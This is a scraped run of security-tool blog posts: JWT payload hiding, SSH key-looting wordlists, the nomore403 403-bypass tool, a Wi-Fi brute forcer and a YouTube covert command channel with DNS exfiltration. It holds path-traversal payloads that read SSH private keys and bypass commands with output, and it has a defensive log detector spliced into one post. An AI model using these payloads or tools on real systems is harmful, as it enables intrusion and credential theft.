'changing_random_value'<br /></code></pre> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li>This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure.</li> <li>It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.</li> </ul> <p>Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.</p> <br /><span style="font-size: x-large;"><b>And...</b></span><br /> <ul> <li>If you find this helpful, please give it a <strong>"star"</strong> ⭐ to support further improvements.</li> </ul> <br /><span style="font-size: x-large;"><b>preview</b></span><br /> <pre><code># python3 main.py<br /><br />- Current Unix Timestamp: 1709160368<br />- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08<br /><br />- userid: 23243232<br />- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'<br />- JWT Secret key: yes_your_service_jwt_secret_key<br /><br />- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=<br />- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c<br /><br />- JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lc3RhbXAiOiIyMDI0LTAyLTI5IDA3OjQ2OjA4IiwidXNlcmlkIjoiVlZaY1VVRlRYMTRGT2tkRVVVRnBFVlpmVFd3S0VHa0xVeFVLYXd0SE9rQUFXMVJYREdZV1FBbz0ifQ.bM_6cBZHdXhMZjyefr6YO5n5X51SzXjyBUEzFiBaZ7Q<br />- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}<br /><br /><br /># run again<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGleVUtRZlYXaBZZCgYOWGlDR10='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}<br />- Decoded JWT: {'timestamp': 
'2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/some-tweak-to-hide-jwt-payload-values" rel="nofollow" target="_blank" title="Download Some-Tweak-To-Hide-Jwt-Payload-Values">Download Some-Tweak-To-Hide-Jwt-Payload-Values</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73888386767938395432024-03-09T08:30:00.001-03:002024-03-09T08:30:00.242-03:00SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/s897/SSH%20Private%20Key%20Looting%20Wordlists.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" 
data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/w640-h362/SSH%20Private%20Key%20Looting%20Wordlists.png" width="640" /></a></div><p><br /></p><p>SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>LFI for Lateral Movement? Gain SSH Access?</b></span><br /> <pre><code>?file=../../../../../../../../home/user/.ssh/id_rsa<br />?file=../../../../../../../../home/user/.ssh/id_rsa-cert<br /></code></pre> <br /><span style="font-size: x-large;"><b>SSH Private Key Looting <a href="https://www.kitploit.com/search/label/Wordlists" target="_blank" title="Wordlists">Wordlists</a> 🔒🗝️</b></span><br /> <p>This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. 
These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.</p> <br /><span style="font-size: large;"><b>Wordlist Files 📝</b></span><br /> <ul> <li><strong>ssh-priv-key-loot-common.txt</strong>: Default and common naming conventions for SSH private key files.</li> <li><strong>ssh-priv-key-loot-medium.txt</strong>: Probable file names without backup file extensions.</li> <li><strong>ssh-priv-key-loot-extended.txt</strong>: Probable file names with backup file extensions.</li> <li><strong>ssh-priv-key-loot-*_w_gui.txt</strong>: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.</li> </ul> <br /><span style="font-size: large;"><b>Usage 🚀</b></span><br /> <p>These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> tool that supports custom wordlists. They can help expand the scope of your brute-forcing or <a href="https://www.kitploit.com/search/label/Enumeration" target="_blank" title="enumeration">enumeration</a> efforts when targeting SSH private key files.</p> <br /><span style="font-size: large;"><b>Acknowledgements 🙏</b></span><br /> <p>This <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> repository was inspired by John Hammond in his vlog "<a href="https://www.youtube.com/watch?v=2rqb3YSa1SE" rel="nofollow" target="_blank" title="Don't Forget This One">Don't Forget This One </a><a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="Hacking">Hacking</a> Trick." </p> <br /><span style="font-size: large;"><b>Disclaimer ⚠️</b></span><br /> <p>Please use these wordlists responsibly and only on systems you are authorized to test. 
Unauthorized use is illegal.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/SSH-Private-Key-Looting-Wordlists" rel="nofollow" target="_blank" title="Download SSH-Private-Key-Looting-Wordlists">Download SSH-Private-Key-Looting-Wordlists</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-58469355253761489642024-03-08T17:36:00.003-03:002024-03-08T17:36:22.430-03:00Nomore403 - Tool To Bypass 403/40X Response Codes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/s1233/Nomore403.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1233" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/w640-h218/Nomore403.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div> <p><code>nomore403</code> is an innovative tool designed to help <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. 
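</p> <p>On the defending side, the request variants this tool produces (the output example further down shows <code>/;///..admin</code> and <code>/%61dmin</code> receiving a 200 where <code>/admin</code> received a 403) are what an access-log monitor should recognise. The following is an added example, not part of nomore403: it canonicalises each requested path and flags requests that reach a protected prefix only through percent-encoding, case switching or dot/semicolon padding, run over constructed log lines.</p>

```python
import posixpath
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access-log lines (Apache combined format); not output of nomore403.
# Lines 2-4 mirror the variants in the tool's output example: the plain path gets
# a 403, then a semicolon/dot-padded path, a percent-encoded one and a
# case-switched one. A 200 on a disguised path means the ACL was actually evaded.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 403 429 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /;///..admin HTTP/1.1" 200 2047 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /%61dmin HTTP/1.1" 200 2047 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:00:04 +0000] "GET /ADMIN HTTP/1.0" 403 429 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "method path version", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) ([^"]+)" (\d{3}) (\S+)')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, version, status, size = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path,
            "version": version, "status": int(status), "size": size}


def canonical_path(raw):
    """Normalise a request path for detection: undo (double) percent-encoding,
    drop ';' path parameters, resolve '.' and '..', strip disguising leading dots
    from segments and lower-case the result. This is deliberately more aggressive
    than a web server's own normalisation, which is fine for an alert, not an ACL."""
    path = raw.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    path = posixpath.normpath("/" + "/".join(s for s in segments if s))
    cleaned = [s.lstrip(".") for s in path.split("/") if s.lstrip(".")]
    return "/" + "/".join(cleaned).lower()


def find_bypass_attempts(log_text, protected=("/admin",)):
    """Flag requests whose canonical path lands on a protected prefix although the
    raw path was written differently (encoding, case, padding)."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        raw_path = rec["path"].split("?", 1)[0]
        canon = canonical_path(raw_path)
        on_target = any(canon == p or canon.startswith(p.rstrip("/") + "/") for p in protected)
        if not on_target or raw_path == canon:
            continue  # undisguised request: the normal access control decides it
        alerts.append({
            "ip": rec["ip"], "ts": rec["ts"], "raw": raw_path, "canonical": canon,
            "status": rec["status"],
            "severity": "bypass" if rec["status"] // 100 == 2 else "attempt",
        })
    return alerts


def attempts_by_source(alerts):
    """Alerts per client address; a burst of variants from one IP is the tool's signature."""
    return Counter(a["ip"] for a in alerts)
```

<p>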
Unlike other solutions, <code>nomore403</code> automates various <a href="https://www.kitploit.com/search/label/Techniques" target="_blank" title="techniques">techniques</a> to seamlessly navigate past these access restrictions, offering a broad range of strategies from header <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> to method tampering.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Prerequisites</b></span><br /> <p>Before you install and run <code>nomore403</code>, make sure you have the following:</p> <ul> <li>Go 1.15 or higher installed on your machine.</li> </ul> <br /><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>From Releases</b></span><br /> <p>Grab the latest release for your OS from our <a href="https://github.com/devploit/nomore403/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page.</p> <br /><span style="font-size: large;"><b>Compile from Source</b></span><br /> <p>If you prefer to compile the tool yourself:</p> <pre><code>git clone https://github.com/devploit/nomore403<br />cd nomore403<br />go get<br />go build<br /></code></pre> <br /><span style="font-size: x-large;"><b>Customization</b></span><br /> <p>To edit or add new bypasses, modify the payloads directly in the <a href="https://github.com/devploit/nomore403/tree/main/payloads" rel="nofollow" target="_blank" title="payloads">payloads</a> folder. 
nomore403 will automatically incorporate these changes.</p> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <br /><span style="font-size: large;"><b>Output example</b></span><br /> <pre><code>[nomore403 ASCII-art banner]<br /><br />Target: https://domain.com/admin<br />Headers: false<br />Proxy: false<br />User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)<br />Method: GET<br />Payloads folder: payloads<br />Custom bypass IP: false<br />Follow Redirects: false<br />Rate Limit detection: false<br />Verbose: false<br /><br />━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━<br />403 429 bytes https://domain.com/admin<br /><br />━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━<br /><br />━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━<br /><br />━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━<br />200 2047 bytes https://domain.com/;///..admin<br /><br />━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━<br />403 429 bytes HTTP/1.0<br />403 429 bytes HTTP/1.1<br />403 429 bytes HTTP/2<br /><br />━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━<br />200 2047 bytes https://domain.com/%61dmin<br /></code></pre> <br /><span style="font-size: large;"><b>Basic Usage</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin<br /></code></pre> <br /><span style="font-size: large;"><b>Verbose Mode + Proxy</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v<br /></code></pre> <br /><span style="font-size: large;"><b>Parse request from Burp</b></span><br /> <pre><code>./nomore403 --request-file request.txt<br /></code></pre> <br /><span style="font-size: large;"><b>Use custom header + specific IP address for bypasses</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -H "Environment: Staging" -b 8.8.8.8<br /></code></pre> <br /><span style="font-size: large;"><b>Set new max of goroutines + add delay between requests</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -m 10 -d 200<br /></code></pre> <br /><span style="font-size: x-large;"><b>Options</b></span><br /> <pre><code>./nomore403 -h<br />Command line application that automates different ways to bypass 40X codes.<br /><br />Usage:<br /> nomore403 [flags]<br /><br />Flags:<br /> -i, --bypass-ip string Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'.<br /> -d, --delay int Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).<br /> -f, --folder string Specify the folder location for payloads if not in the same directory as the executable.<br /> -H, --header strings Add one or more custom headers to requests. Repeatable flag for multiple headers.<br /> -h, --help help for nomore403<br /> --http Use HTTP instead of HTTPS for requests defined in the request file.<br /> -t, --http-method string Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.<br /> -m, --max-goroutines int Limit the maximum number of concurrent goroutines to manage load (default: 50). 
(default 50)<br /> --no-banner Disable the display of the startup banner (default: banner shown).<br /> -x, --proxy string Specify a proxy server for requests, e.g., 'http://server:port'.<br /> --random-agent Enable the use of a randomly selected User-Agent.<br /> -l, --rate-limit Halt requests upon encountering a 429 (rate limit) HTTP status code.<br /> -r, --redirect Automatically follow redirects in responses.<br /> --request-file string Load request configuration and flags from a specified file.<br /> -u, --uri string Specify the target URL for the request.<br /> -a, --user-agent string Specify a custom User-Agent string for requests (default: 'nomore403').<br /> -v, --verbose Enable verbose output for detailed request/response logging.<br /></code></pre> <br /><span style="font-size: x-large;"><b>Contributing</b></span><br /> <p>We welcome contributions of all forms. Here's how you can help:</p> <ul> <li>Report bugs and suggest features.</li> <li>Submit pull requests with bug fixes and new features.</li> </ul> <br /><span style="font-size: x-large;"><b>Security Considerations</b></span><br /> <p>While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.</p> <br /><span style="font-size: x-large;"><b>License</b></span><br /> <p>nomore403 is released under the MIT License. See the <a href="https://github.com/devploit/dontgo403/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br /><span style="font-size: x-large;"><b>Contact</b></span><br /> <p><a href="https://twitter.com/devploit/" rel="nofollow" target="_blank" title="Tool to bypass 403/40X response codes. (10)"><img alt="Tool to bypass 403/40X response codes. 
(3)" src="https://img.shields.io/badge/-Twitter-blue?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/devploit/" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/devploit/nomore403" rel="nofollow" target="_blank" title="Download Nomore403">Download Nomore403</a></span></b></div><hr /><p>Published 2024-03-07</p><span style="font-size: x-large;"><b>WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies</b></span><br /><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. 
This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.</p> <div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <p>The packages are minimal or nearly none 😅. The package install command is:</p> <pre><code>pip install rich pyfiglet<br /></code></pre> <p>That's it.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>So listing the features:</p> <ul> <li><em>Overall Features:</em> <ul> <li>We can use custom interfaces or non-default interfaces to run the attack.</li> <li>Well-defined way of using netsh and listing and utilizing targets.</li> <li>Upgradeability</li> </ul> </li> <li><em>Code-Wise Features:</em> <ul> <li>Interactive menu-driven system with <code>rich</code>.</li> <li>Versatility in using interface, targets, and password files.</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How it works</b></span><br /> <p>So this is how the bruteforcer works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640" /></a></div> <ul> <li> <p><em>Provide Interface:</em></p> </li> <li> <p>The user is 
required to provide the network interface for the tool to use.</p> </li> <li> <p>By default, the interface is set to <code>Wi-F</code><code>i</code>.</p> </li> <li> <p><em>Search and Set Target:</em></p> </li> <li> <p>The user must search for and select the target network.</p> </li> <li> <p>During this process, the tool performs the following sub-steps:</p> <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> <li> <p><em>Input Password File:</em></p> </li> <li> <p>The user inputs the path to the password file.</p> </li> <li> <p>The default path for the password file is <code>./wordlist/default.txt</code>.</p> </li> <li> <p><em>Run the Attack:</em></p> </li> <li> <p>With the target set and the password file ready, the tool is now prepared to initiate the attack.</p> </li> <li> <p><em>Attack Procedure:</em></p> </li> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken:<ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How to run this</b></span><br /> <p style="text-align: left;">After installing all the packages, just run <code>python main.py</code>; the rest is history 👍. Make sure you run this on Windows, because it won't work on any other OS. 
The interface looks like this:</p><p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <br /><span style="font-size: large;"><b>Contributions</b></span><br /> <p>For contributions:</p> <ul> <li><em>First Clone:</em> First clone the repo into your dev env and do the edits.</li> <li><em>Comments:</em> I would appreciate it if you could add comments explaining your POV and also explaining the upgrade.</li> <li><em>Submit:</em> Submit a PR for me to verify the changes and approve it if necessary.</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download WinFiHack</a></span></b></div><hr /><p>Published 2024-03-06</p><span style="font-size: x-large;"><b>SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube</b></span><br /><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" id="BLOGGER_PHOTO_ID_7343001695115503938" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640" /></a></p><br /> <p>SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.</p> <p>The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.</p> <p>It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Run the listener in your Windows system:</p> <p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o"><img alt="" border="0" height="63" id="BLOGGER_PHOTO_ID_7343001700687977618" src="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o=w640-h63" width="640" /></a></p> <p>It checks the Youtube channel at a fixed interval (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a>:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7343001706210908002" src="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo=w496-h640" width="496" /></a></p> <p>Once it finds a <a href="https://www.youtube.com/shorts/-JcDf4pF0qA" rel="nofollow" target="_blank" title="new video">new video</a> in the channel, it decodes the QR code from the video thumbnail, executes the command, and the response is base64-encoded and exfiltrated using DNS:</p> <p style="text-align: center;"><a 
